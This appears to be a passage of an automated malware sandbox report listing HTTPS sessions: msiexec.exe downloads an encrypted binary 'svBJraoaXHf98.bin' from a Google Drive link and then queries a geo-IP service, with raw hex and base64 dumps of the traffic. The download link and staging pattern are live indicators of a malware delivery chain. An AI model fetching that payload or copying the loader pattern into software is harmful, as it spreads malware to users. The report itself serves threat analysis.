                                                                Data Ascii: hNp/D0Drg0jrMwpGVJJV2EDb+lg+GwKGzHu+csvan1y2HqosWvRr4y2B2mPjZKUpsK5EMl0nzdpKWypUmJMOx8Aai3vnIPDpZvyHpJ0sK/25t9dolhiqtDkErADV1qaLNp7hyUkLLssoTHiYSVmn0XQUWqRKX8/hf2zEHQGbfbqJcrs2LzuVV8qbfcMT+28+19R5FP2k2zPDQ2hY1apWv6b0ImE7KtaKTI7nA1OPiziuG7LaGUQHPkX1Iqv2DkH
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 4d 4d 51 47 47 2b 48 42 6c 72 65 62 4a 56 6c 6d 44 32 78 4e 6b 67 70 75 4d 66 39 78 76 54 43 41 4b 2f 76 4c 76 67 38 46 4e 41 56 30 68 44 44 64 74 61 38 34 35 73 35 4a 63 48 54 41 76 33 7a 6f 48 55 2f 74 65 4c 78 55 47 4b 74 66 72 42 53 31 36 2b 53 71 31 62 6c 65 37 76 68 53 6e 50 68 48 49 34 6d 55 67 78 59 73 53 69 4a 44 59 7a 6f 32 53 62 51 5a 74 68 54 76 75 42 6c 7a 59 44 73 4d 33 62 49 70 74 68 71 6a 52 2f 66 65 46 64 6b 32 32 2b 31 34 65 79 59 62 67 4e 7a 78 69 53 4e 64 4b 59 62 36 67 4a 4b 66 59 32 30 79 72 4d 59 56 38 71 47 37 43 55 62 70 72 4f 65 49 38 6b 52 41 39 74 6d 30 77 41 41 6b 63 62 69 37 65 70 46 58 7a 72 53 55 6b 77 67 58 38 79 77 6a 59 79 6e 4a 4f 7a 36 35 74 34 37 30 65 72 52 6a 59 71 67 61 34 72 62 35 4f 77 75 52 70 6b 75 53 6d 5a 63
                                                                Data Ascii: MMQGG+HBlrebJVlmD2xNkgpuMf9xvTCAK/vLvg8FNAV0hDDdta845s5JcHTAv3zoHU/teLxUGKtfrBS16+Sq1ble7vhSnPhHI4mUgxYsSiJDYzo2SbQZthTvuBlzYDsM3bIpthqjR/feFdk22+14eyYbgNzxiSNdKYb6gJKfY20yrMYV8qG7CUbprOeI8kRA9tm0wAAkcbi7epFXzrSUkwgX8ywjYynJOz65t470erRjYqga4rb5OwuRpkuSmZc
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 47 6f 75 33 77 52 71 4c 74 39 35 61 41 43 6f 75 6d 30 69 75 64 35 67 78 35 48 71 4b 31 58 54 48 6d 33 6a 6b 30 71 31 68 4e 6a 4b 51 59 46 77 49 6d 32 41 49 37 49 57 75 50 74 71 74 51 79 61 6c 55 59 63 73 4d 55 38 2b 52 56 2f 51 64 37 37 50 43 79 4a 2f 32 69 77 79 4c 56 58 61 64 67 2b 56 56 56 30 66 68 74 30 49 4f 6a 67 58 33 49 30 49 43 36 67 2f 32 47 6b 2f 65 56 74 42 32 4c 6a 41 44 71 2b 33 77 52 71 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 4c 74 38 45 75 70 6f 4c 44 79 39 34 73 59 35 6b 71 63 58 65 47 47 31 76 32 63 36 52 50 55 39 31 54 34 72 57 68 77 7a 78 63 48 49 6d 33 77 66 4b 4b 4d 73 55 61 32 41 79 70 53 50 43 75 51 50 45 4c 73 49 67 2b 43 6e 53 2f 2b 30 61 39 53 42 6d 62 61 66 36 73 51 44 77 36 4f 39 34 35 58 51 70 78 62 6d 4e 33 6e 72 58
                                                                Data Ascii: Gou3wRqLt95aACoum0iud5gx5HqK1XTHm3jk0q1hNjKQYFwIm2AI7IWuPtqtQyalUYcsMU8+RV/Qd77PCyJ/2iwyLVXadg+VVV0fht0IOjgX3I0IC6g/2Gk/eVtB2LjADq+3wRqLt8Eai7fBGou3wRqLt8EupoLDy94sY5kqcXeGG1v2c6RPU91T4rWhwzxcHIm3wfKKMsUa2AypSPCuQPELsIg+CnS/+0a9SBmbaf6sQDw6O945XQpxbmN3nrX
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 66 42 41 37 64 63 67 2f 31 52 33 63 34 62 33 72 66 42 47 6f 75 33 77 52 71 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 69 61 73 6c 52 32 78 38 31 47 78 35 78 39 52 52 6c 55 49 55 58 64 50 4f 66 4c 36 64 59 6b 4a 4d 47 38 63 4d 61 69 77 37 6b 44 33 37 52 6b 36 43 4d 39 71 44 4b 43 6b 57 30 56 2f 71 74 51 4f 6a 6c 4e 2b 64 37 43 6c 33 64 6b 62 30 63 6c 34 59 43 55 63 41 4d 46 6a 4d 61 62 6f 43 50 30 43 78 4b 2b 7a 4c 69 34 38 67 6b 52 41 4d 44 56 41 73 63 4e 4c 31 4c 71 36 79 52 47 73 32 70 48 63 4c 5a 71 36 65 66 53 4f 6c 46 30 64 45 32 4d 4e 45 46 38 36 61 62 59 67 42 49 62 6e 58 6e 65 66 57 43 42 72 67 76 52 45 41 6f 30 61 62 6d 35 45 49 35 50 76 48 42 49 45 66 70 4d 48 6f 31 6b 64 39 6e 6f 75 6d 38 6e 73 72 52 63 5a 70 67 44 7a 6b 43 73 64 39 55 45
                                                                Data Ascii: fBA7dcg/1R3c4b3rfBGou3wRqLt8Eai7fBGou3wRqiaslR2x81Gx5x9RRlUIUXdPOfL6dYkJMG8cMaiw7kD37Rk6CM9qDKCkW0V/qtQOjlN+d7Cl3dkb0cl4YCUcAMFjMaboCP0CxK+zLi48gkRAMDVAscNL1Lq6yRGs2pHcLZq6efSOlF0dE2MNEF86abYgBIbnXnefWCBrgvREAo0abm5EI5PvHBIEfpMHo1kd9noum8nsrRcZpgDzkCsd9UE
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 4f 51 5a 66 6b 52 33 46 34 75 61 30 78 70 4a 4f 47 35 6d 53 6a 47 46 62 44 53 50 65 35 34 34 31 32 69 7a 42 64 30 37 32 2f 55 42 35 70 76 67 52 42 75 56 74 35 36 74 51 79 7a 67 48 52 43 50 69 55 35 4d 41 4f 79 56 57 53 4b 64 68 74 73 45 61 4e 41 44 33 79 49 72 6c 65 35 4f 73 77 5a 47 62 65 51 72 42 73 67 67 32 4d 32 66 47 52 52 32 62 65 53 66 78 74 2f 4d 32 41 39 6b 62 79 45 6d 54 6b 52 71 76 53 4f 33 37 4b 41 65 51 52 5a 69 4a 42 65 35 44 4e 4e 76 63 31 34 55 4b 67 39 30 6d 63 51 31 53 6b 74 38 43 2f 47 43 67 58 54 70 44 66 4a 36 74 4a 7a 53 34 67 54 75 56 58 46 6c 41 43 6b 44 6b 2b 2b 6e 44 44 61 33 6a 37 55 66 6a 65 33 67 59 4e 6f 6f 5a 76 44 6c 72 4e 69 34 66 54 75 46 76 6a 61 66 36 4b 2f 42 36 63 77 48 61 45 69 6c 48 76 42 41 65 56 52 55 6e 39 30 44
                                                                Data Ascii: OQZfkR3F4ua0xpJOG5mSjGFbDSPe54412izBd072/UB5pvgRBuVt56tQyzgHRCPiU5MAOyVWSKdhtsEaNAD3yIrle5OswZGbeQrBsgg2M2fGRR2beSfxt/M2A9kbyEmTkRqvSO37KAeQRZiJBe5DNNvc14UKg90mcQ1Skt8C/GCgXTpDfJ6tJzS4gTuVXFlACkDk++nDDa3j7Ufje3gYNooZvDlrNi4fTuFvjaf6K/B6cwHaEilHvBAeVRUn90D
                                                                2024-10-10 07:27:45 UTC1390INData Raw: 44 59 6a 4d 4e 61 39 77 70 46 38 41 43 74 34 35 4b 47 41 6c 54 41 43 52 62 52 52 4f 76 34 75 49 77 6c 42 78 56 67 2f 62 7a 6b 38 71 4f 48 42 79 79 78 4e 38 38 36 36 58 74 62 34 61 67 30 72 69 52 62 41 72 47 6b 64 6c 6e 44 57 5a 73 50 51 70 71 61 64 67 47 62 54 49 53 32 38 76 32 4c 74 38 45 61 69 37 66 42 47 6f 75 33 77 52 71 4c 74 38 45 61 69 37 66 67 41 57 2b 54 79 38 61 30 47 2f 6a 44 34 75 71 64 78 78 41 38 64 45 71 4a 74 38 48 57 55 33 53 2f 79 4c 45 69 78 44 63 67 37 41 30 64 51 37 70 50 66 5a 5a 68 6f 71 52 53 6d 76 45 70 65 31 6c 52 4b 53 69 2f 48 77 36 7a 4b 65 58 68 74 48 53 42 44 77 49 36 6c 52 69 4c 74 30 6a 62 32 51 30 45 6d 47 4e 4a 51 4f 68 64 67 4d 48 6a 43 6b 55 31 30 67 6a 50 51 4f 68 73 79 36 70 6c 32 79 74 49 2b 6f 4b 6e 58 48 77 4f 64
                                                                Data Ascii: DYjMNa9wpF8ACt45KGAlTACRbRROv4uIwlBxVg/bzk8qOHByyxN8866Xtb4ag0riRbArGkdlnDWZsPQpqadgGbTIS28v2Lt8Eai7fBGou3wRqLt8Eai7fgAW+Ty8a0G/jD4uqdxxA8dEqJt8HWU3S/yLEixDcg7A0dQ7pPfZZhoqRSmvEpe1lRKSi/Hw6zKeXhtHSBDwI6lRiLt0jb2Q0EmGNJQOhdgMHjCkU10gjPQOhsy6pl2ytI+oKnXHwOd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749969142.250.186.1424434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:19 UTC216OUTGET /uc?export=download&id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2024-10-10 07:28:20 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 10 Oct 2024 07:28:20 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-OI8HRHhGIH9RzGZg13WgHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749974142.250.185.1614434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:20 UTC258OUTGET /download?id=1ggBv_Uz1P3FSEVfHsKLEBxFe4KmO8Ixo&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:23 UTC4897INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="svBJraoaXHf98.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 275520
                                                                Last-Modified: Thu, 10 Oct 2024 02:19:22 GMT
                                                                X-GUploader-UploadID: AHmUCY3SNZZeJtYrSBxKAYX460-P3OcTwMz0wlv5zyapMHMkhZaH-0Tn1YDSBTfIrHRYIT0GxYWps5boTQ
                                                                Date: Thu, 10 Oct 2024 07:28:23 GMT
                                                                Expires: Thu, 10 Oct 2024 07:28:23 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=ItNepg==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-10-10 07:28:23 UTC4897INData Raw: b6 f3 49 70 69 ed ba d8 4e 2d af 56 67 3e c2 51 ae 35 8a 09 20 e2 e5 8d 5a 5b 56 ef 5e 55 ea ad bc ef b0 e6 bc ac d0 93 72 b6 f1 5f b9 04 5e 8e 7e e4 87 fa 57 ce d1 bf a2 2e de 3d 0f c1 b5 0e 03 ac 86 fd 8d 0d 89 c3 bc f0 37 65 7c 0a d4 b5 bd 52 b1 2e 77 9d ff b6 f2 8d 6f 6c 14 43 cc 31 fa ea 07 93 76 38 f2 05 28 1f 27 1c 16 1a a6 6a d5 59 35 a7 22 94 a0 99 f3 0e 51 51 dc 68 d2 8a 11 2b 88 13 53 d9 89 17 32 31 57 f2 df 18 d6 72 47 bf ff 92 e5 b7 2d 64 f6 32 b7 14 ed 7a 1d 10 9e 89 0b bc c1 b5 87 d6 10 25 1b 7f e2 0a 8e 75 fa 30 15 e1 f7 6e 70 62 79 0c 66 6c 17 39 f9 56 2a 70 cd 3f 81 6a cc dd fe 20 ce 3a 73 c4 8d a5 86 f2 53 3b ac 9d 3f 0d cc f6 92 83 d9 3c e4 f4 97 b9 7c 4b 64 71 25 d7 50 7b d9 e4 8b 38 cd 74 30 83 a5 29 96 81 b7 b5 25 0b f7 1c 29 b7 d9
                                                                Data Ascii: IpiN-Vg>Q5 Z[V^Ur_^~W.=7e|R.wolC1v8('jY5"QQh+S21WrG-d2z%u0npbyfl9V*p?j :sS;?<|Kdq%P{8t0)%)
                                                                2024-10-10 07:28:23 UTC4897INData Raw: a7 32 cf 5e 82 46 71 88 8e a3 53 6b 0d 7b 52 7b b2 19 52 ae 78 19 7d 52 4b 68 94 80 1b ac 87 ec 12 fa eb 8d c9 0a 7e cd 92 c0 25 0b 47 7f c1 67 e6 88 d9 75 ea 86 de a5 76 72 8a b7 5a c7 a3 77 15 4e 1b 03 f5 28 dc ad 71 02 4c 66 99 0c ba 4f ac 38 74 e0 9d 21 0c 66 38 2f 4e f8 16 fd 8e 0d 89 c3 b8 f0 37 65 83 f4 d4 b5 05 85 b0 2e 77 45 fe b6 b2 9d 6f 6c 14 06 cc 31 fb f1 37 90 76 89 f2 05 28 0c 27 1c 07 1a a6 42 b6 59 35 ad 29 93 88 c3 f3 0e 5b 52 33 34 d2 8a 15 5b 56 1d 53 67 80 dd 0c 99 db e1 12 39 83 75 4b cc df e8 97 df 4d 79 f1 5f 97 7d 8b 7b 14 7f ea a3 06 b1 e1 c7 f8 b4 30 3f 1c 5f a6 4f ce 51 97 4e 75 8c ce 10 17 68 5d 06 75 69 17 28 fc 25 11 35 cd 35 de 6d de db 25 ca 32 5c 73 ce 8d 7b 88 f2 42 3d 60 95 2c 0a a8 f6 c2 83 d3 22 3c e5 93 c2 11 4b 64
                                                                Data Ascii: 2^FqSk{R{Rx}RKh~%GguvrZwN(qLfO8t!f8/N7e.wEol17v('BY5)[R34[VSg9uKMy_}{0?_OQNuh]ui(%55m%2\s{B=`,"<Kd
                                                                2024-10-10 07:28:23 UTC8INData Raw: bd 27 4c 13 6e e1 a8 e7
                                                                Data Ascii: 'Ln
                                                                2024-10-10 07:28:23 UTC1322INData Raw: cb 7e d5 c6 e6 7a 56 22 8e 07 95 ba f0 64 16 a2 52 dc c4 0d e1 5d f2 7b 5b 09 8e 7d 57 7d e2 77 6d 74 b2 13 04 9f 79 19 77 52 83 48 82 98 33 98 81 9f d8 e9 e4 87 c9 a9 7e cd 92 1e 56 c9 6d 7f cb 35 a2 99 d1 09 d0 86 de fb 05 b1 8a 80 51 a8 67 e6 14 44 1b 1c fd 47 19 ad 71 08 32 59 99 0c be 8d 6b 38 74 f1 9d 30 04 dc bb 3f 4e 86 3e 49 8e 0d 83 b1 20 e0 37 15 ab ae d4 b5 0f 3d 76 2e 77 97 ff a7 ba 90 e2 2c 14 43 cd 14 ec 98 5b 9c 76 48 50 20 3f 37 93 1c 16 10 04 4f cd 2b 43 a8 22 e4 02 bc ea 70 69 51 5c 6c 70 af 05 46 a8 12 53 1d 22 ff 08 f7 7c be 12 3d 20 3f 32 be 77 ed 97 a8 e8 3e e2 5f 97 7d e3 dc 73 7f e0 a9 17 e5 e1 c7 f6 cb f9 4c 75 55 b5 4c a3 64 97 5f 75 f6 8e 61 7d 18 4b 24 e7 6c 17 33 ef a8 7b 26 c7 2e c7 47 c3 cc 2e b2 31 96 73 c4 87 a5 86 d9 58
                                                                Data Ascii: ~zV"dR]{[}W}wmtywRH3~Vm5QgDGq2Yk8t0?N>I 7=v.w,C[vHP ?7O+C"piQ\lpFS"|= ?2w>_}sLuULd_ua}K$l3{&.G.1sX
                                                                2024-10-10 07:28:23 UTC1390INData Raw: 11 e0 a6 cc 84 a8 1e a2 fe 02 84 76 8f 3f 30 50 62 6e 10 29 b9 b9 72 dd a4 9e 9c 98 ec 47 6c 1a 81 96 49 bc 5d 83 c8 05 5d 19 21 a8 e3 7e a3 0c 02 4f 36 a9 5c 09 75 a4 ba 9a 3f 86 07 17 ed 2c 1e 95 67 89 98 a0 0d 26 40 fb d6 40 15 ac 25 31 64 bd d7 ce 6f 73 ae f8 e8 41 8b d6 c9 39 f0 af 95 a5 24 1b 4b 80 b3 5c 48 f0 f6 40 41 6d 8b 1b 0b 1f cd 76 89 10 3d 71 9c 6f ae b9 40 90 15 1a 51 1b 89 64 89 80 76 25 d9 18 54 36 45 1e 8a 5f 05 15 8e 62 d0 97 95 82 a8 e6 c8 c1 a2 0b 04 6f 45 7e 80 19 f0 e3 7f 3f b7 44 f7 0b 07 af 0f 3c 19 5c 1d 6c 76 ba 2d 37 d4 ff 76 ec 31 60 94 c0 bc 9d 2e 40 16 33 ab 71 3c d8 a4 8a 17 97 e9 b1 50 51 93 d8 47 90 b0 98 b3 0e 2f 9d fb 64 0f b2 b4 3f f1 6a ce 85 a1 26 22 9a 4f 76 ca cf 9f a7 12 d8 0c f7 fb 27 cf af a5 ca e2 fc 50 c0 b2
                                                                Data Ascii: v?0Pbn)rGlI]]!~O6\u?,g&@@%1dosA9$K\H@Amv=qo@Qdv%T6E_boE~?D<\lv-7v1`.@3q<PQG/d?j&"Ov'P
                                                                2024-10-10 07:28:23 UTC1390INData Raw: 68 1f 0c 97 59 a4 6b 42 8f 2b 77 da 25 9f dc 9a f9 8b 47 e9 d6 77 f9 1f d5 32 7b 1a 38 c4 dc 45 a3 6b b4 41 cb 8b ee 29 48 c2 65 e4 85 a0 0e 26 e2 2d d0 4d 58 f9 f4 c6 15 19 12 6d 87 e0 3a 30 77 92 34 9b 05 18 1c 08 37 a5 fd 4a 28 4e 52 1b 08 f7 26 5c d6 3a da 57 41 f4 92 70 11 d3 c7 3f c3 28 a1 75 db 47 d1 6d 60 b2 eb 4c d8 cb c8 7a 04 ee a9 40 e6 03 09 6b a4 66 a3 66 e3 c4 83 0b 2d 56 56 f8 c8 53 b4 f2 e3 9c 6e 0b 9e 98 41 95 13 e5 f8 03 7c 0f d2 fd a7 d7 1f bc a2 a2 9c 0a 7a 9b 5f 6c 9f b8 f6 c1 43 a2 86 49 ff d0 bd 75 a1 5f c8 ca 1a a7 d0 bc 09 ad 84 e4 84 b2 d8 86 0e 3a ca e6 11 e4 87 e6 3c 5a ec 8f e2 64 51 84 1f 81 47 a5 e1 9b 80 9a 2d 85 5b 7e cf 45 e0 53 f8 2e 6e 87 12 f2 5b 5f bd c3 05 1e 61 ef d3 a9 99 83 f5 f7 24 83 f6 df de f1 a4 44 d8 a6 c8
                                                                Data Ascii: hYkB+w%Gw2{8EkA)He&-MXm:0w47J(NR&\:WAp?(uGm`Lz@kff-VVSnA|z_lCIu_:<ZdQG-[~ES.n[_a$D
                                                                2024-10-10 07:28:23 UTC1390INData Raw: f4 00 ab f9 3e b7 19 bb 27 5b db 10 65 1c 02 bf f9 4c 8d d3 ea b0 4a a4 f2 47 25 68 86 f7 14 dc 2f 56 a7 4f ec ac c5 e6 b8 f3 9e 94 4d 69 b6 af 19 08 be 56 82 12 91 12 b3 b1 13 ec 01 bb 3e 21 d3 dc 58 e2 99 c0 55 5e c5 c6 a5 f4 49 96 41 e1 f9 dc a2 a1 68 92 f2 72 8d 98 c2 9d d4 56 80 19 fe f5 01 29 67 7e 15 09 c1 c8 e3 50 27 43 00 3f af 55 8d ab ae b1 13 ee d7 44 69 34 8c 59 e7 d8 c7 1a 9e d5 a6 dd 2c 07 90 40 67 8e 96 13 d7 b9 d9 14 f4 58 d5 a1 93 65 ee b2 7a 25 2a c0 18 e3 93 dc 45 cb d5 81 99 2f fb 45 27 12 b3 02 fe 5b b3 17 fe dd fa 06 de 4b 90 e7 4e e9 94 48 67 7d 2a 9a 0a 18 57 95 c5 05 f9 b8 cf 00 79 f1 5c 19 f4 7b c1 42 54 87 c1 cf 6b d5 a1 bd 85 23 71 5a 5f 84 a2 69 78 c5 30 f0 f2 36 c3 6a 4c 98 f4 4f 0e 82 ac 10 22 54 9a 16 98 90 1b 74 05 85 ef
                                                                Data Ascii: >'[eLJG%h/VOMiV>!XU^IAhrV)g~P'C?UDi4Y,@gXez%*E/E'[KNHg}*Wy\{BTk#qZ_ix06jLO"Tt
                                                                2024-10-10 07:28:23 UTC1390INData Raw: fc d6 a9 f6 97 32 22 23 96 a4 7c 96 eb 7d 51 53 cd f9 29 6b 7d 88 df d7 ae 97 6d 54 58 f9 06 f9 f8 91 7a 41 e5 66 ee a5 ca c1 e5 cd e8 de a1 31 6c 95 a8 1e 40 4d 8e 5c 99 71 58 6d eb 7c fb c5 a2 2a ec a3 51 25 4b cc 2c 15 62 8a 5d c0 06 49 29 cb b9 bb 25 94 c0 c6 a8 ba d3 de ea bb c3 f3 99 b8 08 05 71 a3 93 d6 52 0d e6 19 86 25 93 1b f7 44 be 49 15 ea b5 5e dd c9 19 e6 0e 8d 06 7e b0 0a 05 f7 03 08 37 4d e9 3e 35 ae c0 b5 6d ba c1 8a f0 d1 72 db 95 a8 6a 27 0a 40 18 47 cd 77 e0 76 9a 43 24 29 79 11 3d 9f 0b 37 cf 07 5f 52 4e 2a 42 1f a3 c0 32 b7 68 fe 2f e7 3a 97 39 f3 9b fb b3 4d f8 b4 9a ae a8 1d 9f 8c 86 b1 b6 76 5a 1e d2 97 b4 91 b2 97 2e 98 6e 98 c3 87 3c b6 75 a9 be 0c ba 8c 88 4b 5f ac cd 51 a5 43 9d b8 ee 85 95 70 b3 00 b5 6e e7 b8 21 8a 33 a1 5b
                                                                Data Ascii: 2"#|}QS)k}mTXzAf1l@M\qXm|*Q%K,b]I)%qR%DI^~7M>5mrj'@GwvC$)y=7_RN*B2h/:9MvZ.n<uK_QCpn!3[
                                                                2024-10-10 07:28:23 UTC1390INData Raw: f0 2e 35 31 22 fe 7d 26 ee 0f c7 7e 0f fb 4c 03 03 74 fb 86 e8 63 2e 68 65 1a 9f 57 8c e2 2c 9d ee 82 ac ce 29 70 d9 9e 88 08 4d b5 9b 5e 6b 12 ec cc 02 5d f4 e1 d8 32 a0 98 5b 1c 23 c2 41 7a 61 af 51 7d 4d 59 a4 85 4e 73 f1 06 69 88 35 36 dc a5 43 4f a3 79 33 6b 8a 28 d2 5b e0 46 72 9c 5e df e0 a8 38 38 f0 dc 73 83 27 4e 39 76 17 d8 1d 2d 3b b2 18 0c 0b 4e ab c9 40 55 0b 18 f0 cb 1c 3f ed 66 08 19 30 81 60 1e ec be 36 1c 21 54 00 2c e9 db 8b b8 97 99 5b 42 00 b3 4a 3b e9 d7 7d d7 82 75 f9 de aa 23 0e 27 89 f6 3c b8 99 3c c7 78 6d 84 b3 e5 54 db 91 29 5f 35 8a 73 a3 ca 62 e5 6f 41 24 02 d5 cc 5e 67 70 bb 5f 37 72 6f 87 80 a7 d7 ae 72 06 ff 92 4e 05 ca 44 ab cf b3 9c 73 f1 c8 4f 8c 6d 9f 8d fd c1 a7 e6 96 2a de 28 7c a2 fa 17 b5 43 23 39 5d 5d ea fe 28 f6
                                                                Data Ascii: .51"}&~Ltc.heW,)pM^k]2[#AzaQ}MYNsi56COy3k([Fr^88s'N9v-;N@U?f0`6!T,[BJ;}u#'<<xmT)_5sboA$^gp_7rorNDsOm*(|C#9]](
                                                                2024-10-10 07:28:23 UTC1390INData Raw: 88 d3 64 c8 9d 53 bf 76 72 8b a5 4d b5 e1 f1 14 3e b9 28 e2 00 68 ad 71 08 ee 41 81 7e cc ed ad 48 d6 de 84 5f 34 ae 39 2b ec d3 0c 8f b5 0e 89 b3 1a d8 42 65 83 ff c7 96 13 7a c7 2e 77 97 ff 96 b2 81 6f 6c 3c 34 cc 31 f0 ea 07 ed 49 38 f2 01 39 3d 55 7e 01 1a d6 14 ca 59 35 a3 0a dd a0 99 f9 1f 72 2f 1c 68 d2 8e 37 0a 32 1d 55 6d 5e ca 36 a1 62 be 12 33 91 3e 2e e4 bd e2 97 d2 94 16 97 5f 97 09 bb 14 73 7b 98 fe 6b d9 91 d1 da 39 30 4c 7f 49 58 44 ce 70 86 7a 5d d8 c4 ee 3d 68 5d 0d 43 7a 65 1d ef 56 0a 97 e8 28 e5 df cf dd 2d 07 7b 44 01 b2 82 a5 f6 50 76 22 32 a5 3d 0c c3 55 e7 99 ab 19 e3 f4 e7 0f 59 50 1a 51 25 d7 5a e5 f8 f8 f9 28 db 74 40 61 89 5c 96 81 fd a6 03 55 b6 1c 29 b1 ab f2 7f 1e 92 f8 25 f0 81 93 b2 d0 12 2c fc 3c f6 ec 45 a5 2d 4d 33 70
                                                                Data Ascii: dSvrM>(hqA~H_49+Bez.wol<41I89=U~Y5r/h72Um^6b3>._s{k90LIXDpz]=h]CzeV(-{DPv"2=UYPQ%Z(t@a\U)%,<E-M3p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749978188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:27 UTC697INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: MISS
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2v1hnqbCoFoFWThdZVJ%2F%2FSO%2ByCreZYUnqSyPoXb5BE9%2F7SUgo92ZfFORAsGSaqjfyqigyGgMBsUvYHoWWGz1lHAfo19JKPNYV38VtUBv5lDyDe5BDxH33NuHQTNk5ulkv9sIj3UG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e4c69c65c32b-EWR
                                                                alt-svc: h3=":443"; ma=86400
